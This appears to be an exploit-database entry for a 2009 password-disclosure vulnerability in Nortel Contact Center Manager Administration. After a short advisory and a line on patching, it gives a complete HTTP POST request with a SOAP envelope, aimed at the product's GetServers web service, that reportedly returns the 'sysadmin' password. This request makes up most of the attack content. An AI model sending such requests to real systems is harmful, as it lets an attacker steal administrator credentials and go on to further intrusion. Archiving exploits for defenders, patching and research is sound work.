header-logo
Suggest Exploit
vendor:
Contact Center Manager Administration
by:
SecurityFocus
7.5
CVSS
HIGH
Password Disclosure
200
CWE
Product Name: Contact Center Manager Administration
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Nortel Contact Center Manager Administration Password Disclosure Vulnerability

Nortel Contact Center Manager Administration is prone to a password-disclosure vulnerability caused by a design error. Attackers can exploit this issue to gain access to the 'sysadmin' password. Successfully exploiting this issue may lead to other attacks.

Mitigation:

Administrators are advised to apply the appropriate updates to affected systems.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34964/info

Nortel Contact Center Manager Administration is prone to a password-disclosure vulnerability caused by a design error.

Attackers can exploit this issue to gain access to the 'sysadmin' password. Successfully exploiting this issue may lead to other attacks. 

POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx
HTTP/1.1
Host: 10.1.2.3
Content-Type: text/xml; charset=utf-8
SOAPAction:
"http://www.example.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper"
Content-Length: 661

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SOAPWrapperCommon_UsersWS_GetServers_Wrapper
xmlns="http://SoapWrapperCommon.CCMA.Applications.Nortel.com">
      <ccmaUserName>string</ccmaUserName>
      <clientIP>string</clientIP>
      <componentID>string</componentID>
      <sessionID>string</sessionID>
      <strUserID>string</strUserID>
      <strPassword>string</strPassword>
    </SOAPWrapperCommon_UsersWS_GetServers_Wrapper>
  </soap:Body>
</soap:Envelope>

Navigation

Suggest Exploit

Services By CQR